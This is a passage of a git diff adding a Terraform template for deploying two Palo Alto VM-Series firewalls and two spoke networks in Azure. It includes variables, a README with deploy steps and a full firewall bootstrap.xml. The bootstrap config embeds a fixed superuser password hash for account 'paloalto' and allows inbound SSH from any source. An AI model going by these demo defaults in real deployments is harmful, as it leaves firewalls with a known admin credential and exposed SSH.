+  description = "Prefix to add to all resource groups created.  This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+  type = list(string)
+}
+
+variable transit_subnet_cidrs {
+  type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+  description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+  type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+  description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+  type = list(string)
+}
+
+variable tags {
+  description = "The tags to associate with newly created resources"
+  type        = map(string)
+
+  default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+  description = "Azure client ID"
+  default = ""
+}
+
+variable client_secret {
+  description = "Azure client secret"
+  default = ""
+}
+
+variable subscription_id {
+  description = "Azure subscription ID"
+  default = ""
+}
+
+variable tenant_id {
+  description = "Azure tenant ID"
+  default = ""
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/README.md b/azure/transit_2fw_2spoke_common_appgw/README.md
new file mode 100644
index 00000000..01101669
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / AppGW / 2 x Spoke VNETs
+
+This is an extension of the Terraform template located at [**transit_2fw_2spoke_common**](https://github.com/wwce/terraform/tree/master/azure/transit_2fw_2spoke_common).
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering).  The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs.  All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet.  All inbound traffic from the internet is sent through a public load balancer or an application gateway (both are deployed). The Application Gateway is configured to load balance HTTP traffic on port 80.
+
+N.B. - The template can take 15+ minutes to complete due to the Application Gateway deployment time. When complete, the FQDN of the Application Gateway is included in the output.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+</br>
+
+## Prerequistes 
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+  
+</br>
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**.
+```
+# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1:<byol><bundle1><bundle2>:9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+<p align="center">
+<b>Your terraform.tfvars should look like this before proceeding</b>
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/images/tfvars.png" width="75%" height="75%" >
+</p>    
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+</br>
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+</br>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+<?xml version="1.0"?>
+<config version="9.0.0" urldb="paloaltonetworks">
+  <devices>
+    <entry name="localhost.localdomain">
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <dns-setting>
+            <servers>
+              <primary>8.8.8.8</primary>
+              <secondary>4.2.2.2</secondary>
+            </servers>
+          </dns-setting>
+          <hostname>fw1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <hostname>fw1</hostname>
+              <username>paloalto</username>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+            </initcfg>
+          </management>
+          <ctd>
+            <x-forwarded-for>yes</x-forwarded-for>
+          </ctd>
+        </setting>
+      </deviceconfig>
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <enabled>no</enabled>
+                </ipv6>
+                <interface-management-profile>allow-health-probe</interface-management-profile>
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <dhcp-client>
+                  <enable>yes</enable>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+              </layer3>
+              <comment/>
+            </entry>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <enabled>no</enabled>
+                </ipv6>
+                <interface-management-profile>allow-health-probe</interface-management-profile>
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <dhcp-client>
+                  <enable>yes</enable>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+              </layer3>
+              <comment/>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-health-probe">
+              <ping>no</ping>
+              <telnet>no</telnet>
+              <ssh>yes</ssh>
+              <http>no</http>
+              <http-ocsp>no</http-ocsp>
+              <https>no</https>
+              <snmp>no</snmp>
+              <response-pages>no</response-pages>
+              <userid-service>no</userid-service>
+              <userid-syslog-listener-ssl>no</userid-syslog-listener-ssl>
+              <userid-syslog-listener-udp>no</userid-syslog-listener-udp>
+              <permitted-ip>
+                <entry name="168.63.129.16/32"/>
+              </permitted-ip>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="untrust-vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+            </interface>
+            <admin-dists>
+              <static>10</static>
+              <static-ipv6>10</static-ipv6>
+              <ospf-int>30</ospf-int>
+              <ospf-ext>110</ospf-ext>
+              <ospfv3-int>30</ospfv3-int>
+              <ospfv3-ext>110</ospfv3-ext>
+              <ibgp>200</ibgp>
+              <ebgp>20</ebgp>
+              <rip>120</rip>
+            </admin-dists>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>10.0.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="to-spoke1">
+                    <nexthop>
+                      <next-vr>trust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>10.1.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="to-spoke2">
+                    <nexthop>
+                      <next-vr>trust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>10.2.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+          <entry name="trust-vr">
+            <interface>
+              <member>ethernet1/2</member>
+            </interface>
+            <admin-dists>
+              <static>10</static>
+              <static-ipv6>10</static-ipv6>
+              <ospf-int>30</ospf-int>
+              <ospf-ext>110</ospf-ext>
+              <ospfv3-int>30</ospfv3-int>
+              <ospfv3-ext>110</ospfv3-ext>
+              <ibgp>200</ibgp>
+              <ebgp>20</ebgp>
+              <rip>120</rip>
+            </admin-dists>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-probe">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>168.63.129.16/32</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="default">
+                    <nexthop>
+                      <next-vr>untrust-vr</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke1">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.1.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spoke2">
+                    <nexthop>
+                      <ip-address>10.0.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.2.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <protocol>
+              <bgp>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <enable>no</enable>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+          </entry>
+        </virtual-router>
+      </network>
+      <vsys>
+        <entry name="vsys1">
+          <zone>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+              <enable-user-identification>no</enable-user-identification>
+            </entry>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+              <enable-user-identification>no</enable-user-identification>
+            </entry>
+          </zone>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/2</member>
+                <member>ethernet1/1</member>
+                <member>vlan</member>
+                <member>loopback</member>
+                <member>tunnel</member>
+              </interface>
+              <vlan/>
+              <virtual-router>
+                <member>untrust-vr</member>
+                <member>trust-vr</member>
+              </virtual-router>
+              <virtual-wire/>
+            </network>
+          </import>
+          <application/>
+          <application-group/>
+          <service>
+            <entry name="tcp-22">
+              <protocol>
+                <tcp>
+                  <port>22</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="health-check" uuid="a91152e7-1ea9-441b-b7bc-2ddcf935c328">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>azure-lb-probe</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-web" uuid="906ac66f-810d-4b10-a1f3-3ca4de7f5562">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="inbound-ssh" uuid="1ef5074f-a01a-4270-9717-c3daf57fc1ea">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="east-west-trusted" uuid="310224a5-ebed-4ef7-aa8c-d137948e164d">
+                  <rule-type>universal</rule-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <source>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </source>
+                  <negate-source>no</negate-source>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <destination>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </destination>
+                  <negate-destination>no</negate-destination>
+                  <application>
+                    <member>ping</member>
+                    <member>ssh</member>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <disabled>no</disabled>
+                  <icmp-unreachable>no</icmp-unreachable>
+                  <option>
+                    <disable-server-response-inspection>no</disable-server-response-inspection>
+                  </option>
+                </entry>
+                <entry name="outbound" uuid="23d8a1b8-1a4b-462a-b7d6-d7cd25007c3f">
+                  <rule-type>universal</rule-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <source>
+                    <member>spoke1-vnet</member>
+                    <member>spoke2-vnet</member>
+                  </source>
+                  <negate-source>no</negate-source>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <negate-destination>no</negate-destination>
+                  <application>
+                    <member>apt-get</member>
+                    <member>ntp</member>
+                    <member>ping</member>
+                    <member>ssl</member>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <disabled>no</disabled>
+                  <icmp-unreachable>no</icmp-unreachable>
+                  <option>
+                    <disable-server-response-inspection>no</disable-server-response-inspection>
+                  </option>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="interzone-default" uuid="3d00ca2f-4af5-40e1-8fad-edd407f1bf59">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="intrazone-default" uuid="537e2fbf-aaee-4fe5-bad3-f9552f18d7d8">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <application-override>
+              <rules/>
+            </application-override>
+            <decryption>
+              <rules/>
+            </decryption>
+            <tunnel-inspect>
+              <rules/>
+            </tunnel-inspect>
+            <authentication>
+              <rules/>
+            </authentication>
+            <nat>
+              <rules>
+                <entry name="azure-probe-no-nat" uuid="e9ee92aa-2bc6-4792-add3-d99a134b212d">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>any</to-interface>
+                  <service>any</service>
+                  <source>
+                    <member>azure-lb-probe</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <description>This NAT policy prevents the public load balancer's health probes from being NATed.</description>
+                </entry>
+                <entry name="inbound-http" uuid="f059ba30-01b2-49ad-9ff1-0d2195e3b561">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>ethernet1/1</to-interface>
+                  <service>service-http</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                  <description>NATs inbound request to internal LB in spoke1</description>
+                </entry>
+                <entry name="inbound-ssh" uuid="1858311c-6126-4601-9766-da8d0ba5f7b5">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>ethernet1/1</to-interface>
+                  <service>tcp-22</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <disabled>no</disabled>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <description>NATs inbound request to jump server in Spoke 1.</description>
+                </entry>
+                <entry name="outbound" uuid="fd57dee6-7745-4776-8800-fe8fe76bd7ab">
+                  <nat-type>ipv4</nat-type>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <to-interface>any</to-interface>
+                  <service>any</service>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <disabled>no</disabled>
+                </entry>
+              </rules>
+            </nat>
+            <qos>
+              <rules/>
+            </qos>
+            <pbf>
+              <rules/>
+            </pbf>
+            <dos>
+              <rules/>
+            </dos>
+          </rulebase>
+          <address>
+            <entry name="azure-lb-probe">
+              <ip-netmask>168.63.129.16/32</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm">
+              <ip-netmask>10.1.0.4</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.2.0.4</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vnet">
+              <ip-netmask>10.1.0.0/16</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vnet">
+              <ip-netmask>10.2.0.0/16</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.1.0.100</ip-netmask>
+              <tag>
+                <member>azure-resource</member>
+              </tag>
+            </entry>
+          </address>
+          <address-group/>
+          <external-list/>
+          <region/>
+          <application-tag/>
+          <application-filter/>
+          <profile-group/>
+          <authentication-object/>
+          <tag>
+            <entry name="untrust">
+              <color>color20</color>
+            </entry>
+            <entry name="trust">
+              <color>color13</color>
+            </entry>
+            <entry name="azure-resource">
+              <color>color24</color>
+            </entry>
+            <entry name="azure-vnet">
+              <color>color22</color>
+            </entry>
+          </tag>
+          <application-status/>
+          <threats>
+            <vulnerability/>
+            <spyware/>
+          </threats>
+          <profiles>
+            <virus/>
+            <spyware/>
+            <vulnerability/>
+            <url-filtering/>
+            <custom-url-category/>
+            <file-blocking/>
+            <data-filtering/>
+            <data-objects/>
+            <hip-objects/>
+            <hip-profiles/>
+            <dos-protection/>
+            <decryption/>
+            <wildfire-analysis/>
+            <gtp/>
+            <sctp/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>*</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+      </entry>
+      <entry name="paloalto">
+        <phash>$1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
